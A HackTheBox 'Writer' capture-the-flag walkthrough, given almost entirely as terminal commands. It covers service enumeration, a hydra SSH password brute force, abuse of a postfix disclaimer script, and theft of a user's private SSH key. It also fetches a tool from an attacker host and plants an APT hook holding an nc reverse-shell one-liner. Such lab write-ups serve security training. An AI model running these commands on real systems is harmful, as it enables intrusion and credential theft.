HackTheBox – Writer Walkthrough
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A -v -T4 -Pn 10.10.11.101
┌──(rootkali)-[/home/kali/Downloads]
└─# echo 10.10.11.101 writer.htb > /etc/hosts
┌──(rootkali)-[/home/kali/Downloads]
└─# wfuzz -w /usr/share/dirb/wordlists/big.txt -u http://writer.htb/FUZZ –hc 404 -t 200
http://writer.htb/administrative
Now SMBEnumeration
┌──(rootkali)-[/home/kali/Downloads]
└─# smbmap -H writer.htb –R
┌──(rootkali)-[/home/kali/Downloads]
└─# rpcclient -U “” -N writer.htb
rpcclient $> help
rpcclient $> enumdomusers
rpcclient $> queryuser kyle
┌──(rootkali)-[/home/kali/Downloads]
└─# hydra -l kyle -P rockyou.txt ssh://writer.htb -VV -f -t 60
Username: kyle
Password: marcoantonio
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh kyle@10.10.11.101
kyle@writer:/tmp$ find / -type f -group filter 2>/dev/null
kyle@writer:/tmp$ cat /etc/postfix/disclaimer
So going through the script I tried to append the reverse shell in the script but the problem is before running the appended code there is a cron job that is set to clear the script to default state. So we have to use a python script to send this file as mail.
Code: shell.py
import smtplib
host = ‘127.0.0.1’
port = 25
sender_email = “kyle@writer.htb”
receiver_email = “kyle@writer.htb”
message = “””\
Subject: Hi there
Test_python_sender.”””
try:
server = smtplib.SMTP(host, port)
server.ehlo()
server.sendmail(sender_email, receiver_email, message)
except Exception as e:
print(e)
finally:
server.quit()
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -lvnp 1234
kyle@writer:/tmp$ cp disclaimer /etc/postfix/disclaimer && python3 shell.py
john@writer:/var/spool/postfix$ cd /home/john/.ssh/
john@writer:/home/john/.ssh$ ls –lrt
john@writer:/home/john/.ssh$ cat id_rsa
┌──(rootkali)-[/home/kali/Downloads]
└─# chmod 600 id_rsa
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh john@10.10.11.101 -i id_rsa
kyle@writer:/tmp$ find / -type d -group management 2>/dev/null
https://github.com/DominicBreuker/pspy
john@writer:~$ cd /tmp
john@writer:/tmp$ wget http://10.10.14.14:8000/pspy32
john@writer:/tmp$ chmod +x pspy32
john@writer:/tmp$ ./pspy32
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -lvnp 9000
So, to get a reverse shell need to enter this command and wait for a sec. Replace IP and start nc or pwncat in a new terminal for connection.
john@writer:/tmp$ cd /etc/apt/apt.conf.d/
john@writer:/etc/apt/apt.conf.d$ echo ‘APT::Update::Pre-Invoke: {“rm /tm/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 9000 >/tmp/f”};’ > /etc/apt/apt.conf.d/shell